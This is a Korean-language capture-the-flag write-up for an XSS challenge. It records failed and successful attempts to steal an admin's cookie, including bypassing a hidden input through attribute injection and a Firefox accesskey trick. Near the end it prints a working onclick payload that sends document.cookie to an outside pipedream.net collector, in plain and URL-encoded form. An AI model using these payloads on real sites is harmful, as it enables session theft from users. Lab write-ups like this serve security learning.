[CTF] XSS 5

CHIKA·2024년 6월 30일

📌
XSS (Cross Site Scripting)
Cookie 탈취

취약점 설명 : Stored XSS
취약점 발생 위치 : notice_write_process.php

실패과정.1 (권한없음)

회원가입 - 로그인 - 게시판 글쓰기에서 꺽쇠 HTML Entity까지 확인.
notice_update.php 에서 title input value 부분에 타이틀 입력값이 들어간다는 것을 확인함.
EventHandler onclick을 이용해서 해당 input을 클릭하면 alert(document.cookie)가 뜨게 시도.

쿠키값이 뜬다! 그대로 쿠키탈취코드 삽입해보자.
제목을 다음과 같이 작성한다.

해당 게시물 누르고 update, title input창 클릭

쿠키값이 공격자 서버로 넘어온다! 이 URL을 관리자 봇에게 보내보자.

alert창이 2개 이상 뜨면 해당 경고가 뜨는 것 같다.
새 창 띄워서 접속해봄

alert창이 안뜬다. 로그아웃을 했어야 했는데 안해서 정상 접속이 됐던것이다.
이 사실을 인지하지 못하고 onclick에 문제가 있는 줄 알았다.
onclick은 클릭을 해야 스크립트가 실행되니까 해당 페이지에 들어오자마자 실행되게 할 수 있는 방법? autofocus onfocus를 사용해보자.

제목에

로 글을 작성 후 해당 게시물 클릭-update

http://ctf.segfaulthub.com:4343/xss_6/notice_update.php?id=238

URL에 접속하면 바로 쿠키값이 공격자서버로 보내진다.
로그아웃하고 URL에 접속하면?

alert창이 두 개 뜬다. 관리자 Bot에서 경고가 떴던 이유이다.
다른 사용자로 로그인하고 해당 URL에 접속해도 같은 창이 뜬다.

그럼 로그인 없이 or 다른 사용자로 로그인 후 접속되는 페이지가 뭔지부터 알아보자.

실패과정.2 (input type="hidden")

XSS5 다른사용자 접속가능 페이지
index.php
login.html
mypage.php?user=xcvb (해도 칸에는 해당 사용자 아이디)
notice_list.php
notice_read.php?
notice_update.php?

나는 실패과정.1 에서 notice_update.php 에 대한 취약점을 발견했으므로 권한없이 접속 할 수 있는 방법을 모색했다.

http://ctf.segfaulthub.com:4343/xss_6/notice_update.php?id=238 와 같이 이미 id(idx)에 해당하는 글이 있으면 접속이 권한이 없다는 메세지가 뜬다.

하지만
http://ctf.segfaulthub.com:4343/xss_6/notice_update.php?id=처럼 id에 값을 넣어주지 않거나 id(idx)에 해당하는 글이 없으면 접속이 가능하다.

특수문자 삽입이 가능한지 확인하자.

꺽쇠는 <,> 로 바뀐다.
id의 값이 input name="id" 의 value값으로 삽입이 됨을 확인.
꺽쇠가 사용 불가하므로 input 태그를 탈출하지 못한다.
input태그 안에서 alert(1) 띄워보자.

id값에 " autofocushttps://velog.velcdn.com/images/dmkr9845/post/f6899b6e-2139-482c-b387-df79acf6ed9d/image.PNG">

alert창이 출력되지 않는다. input 의 hidden 속성 때문이다.

🔎 input type = "hidden"

onclick, onfocus 등 Event Handler가 작동하지 않는다.

input type="hidden" 우회 (꺽쇠 사용X)

1. value(파라미터가 삽입되는 곳)가 type="hidden" 앞에 위치할 경우

<input name="id" value="입력값" type="hidden"/> 의 경우
입력값에 type="text" 등 타입을 지정해주는 방법으로 우회할 수 있다.
입력값 : " type = "text
<input name="id" value="" type="text" type="hidden"/> 이런식으로.

2. value(파라미터가 삽입되는 곳)가 type="hidden" 뒤에 위치할 경우

<input name="id" type="hidden" value="입력값"/>

여기서 hidden을 우회하는 방법?
아주 제한적인 조건하에서만 가능하다.

조건
1. Firefox 브라우저 사용
2. accesskey 입력

firefox에서 id값에 " accesskey="x" onclick=alert("XSS") x="입력.
URL :

http://ctf.segfaulthub.com:4343/xss_6/notice_update.php?id=%22+accesskey%3D%22x%22+onclick%3Dalert(%22XSS%22)+x%3D%22

alt + shift + x 키를 누르면 alert창이 뜬다.

쿠키 탈취까지 해보자.
id값으로" accesskey="x" onclick='javascript: var cookieData = document.cookie; var i = new Image(); i.src ="https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData;'

URL :
http://ctf.segfaulthub.com:4343/xss_6/notice_update.php?id=%22+accesskey%3d%22x%22+onclick%3d%27javascript%3a+var+cookieData+%3d+document.cookie%3b+var+i+%3d+new+Image()%3b+i.src+%3d%22https%3a%2f%2fen2hyoic3j7mi.x.pipedream.net%2f%3fcookie%3d%22+%2b+cookieData%3b%27